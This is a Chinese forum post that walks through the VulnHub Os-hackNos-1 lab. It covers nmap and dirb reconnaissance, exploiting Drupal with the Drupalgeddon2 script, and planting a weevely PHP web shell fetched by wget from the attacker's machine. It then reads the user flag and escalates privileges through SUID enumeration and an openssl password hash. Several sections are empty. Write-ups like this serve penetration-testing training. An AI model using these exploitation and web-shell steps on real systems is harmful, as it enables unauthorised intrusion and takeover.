ToB企服应用市场:ToB评测及商务社交产业平台

标题: Os-hackNos-1 [打印本页]

作者: 羊蹓狼    时间: 2024-5-15 18:26
标题: Os-hackNos-1
一、环境搭建

实验主机:kali-linux 2023 虚拟机(VM)
实验靶机:Os-hackNos-1 靶机(VM)
实验网络:桥接模式
flag:1.平凡用户的user.txt;2.root用户的user.txt
技能:漏洞利用 | web应用 | 暴力破解 | 权限提升
靶机下载:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/
二、信息收集

主机发现:
  1. 1 ifconfig
复制代码

  1. 1 nmap -sP 192.168.133.0/24
复制代码

  1. 1 netdiscover -i eth0 -r 192.168.133.0/24
复制代码

端口扫描:
  1. 1 nmap -sTV -p- -Pn 192.168.133.97
复制代码

  1. 1 22 端口 :SSH 服务端口,可能存在弱口令和暴力破解
  2. 2 80 端口 :HTTP 端口,可以通过目录扫描,去发现网站目录或者网站源码泄露或者备份文件泄露
复制代码

目录探测:
  1. 1 dirb http://192.168.133.97
复制代码


三、漏洞发现


四、漏洞利用
  1. 1 将脚本拷贝下来
  2. 2 git clone https://github.com/dreadlocked/Drupalgeddon2.git
  3. 3
  4. 4 在运行脚本前,需要预装依赖包 highline
  5. 5 gem install highline
  6. 6
  7. 7 执行脚本
  8. 8 ruby drupalgeddon2.rb http://192.168.133.97/drupal/
复制代码



五、权限提升

利用weevely(kali 菜刀)
  1. 1 生成木马:
  2. 2 weevely generate hello ./door.php
  3. 3
  4. 4 打开kali web服务器:
  5. 5 python -m http.server 80
  6. 6
  7. 7 在靶机上使用wget工具下载 kali 上生成的木马文件:
  8. 8 wget http://192.168.133.125:80/door.php
复制代码




  1. 1 weevely http://192.168.133.97/drupal/door.php hello
复制代码

浏览用户目录
  1. 1 cd /home
  2. 2 ls -lh
  3. 3 cd james/
  4. 4 ls -lh
  5. 5 cat user.txt
复制代码

  1. 1 bae11ce4f67af91fa58576c1da2aad4b
复制代码



切换用户

suid 提权
  1. 1  audit_suidsgid -only-suid /
复制代码

  1. 1 openssl passwd -1 -salt 账号 密码
复制代码







利用metasploit



  1. 1 python3 -c "import pty;pty.spawn('/bin/bash')"
复制代码


错误总结




免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4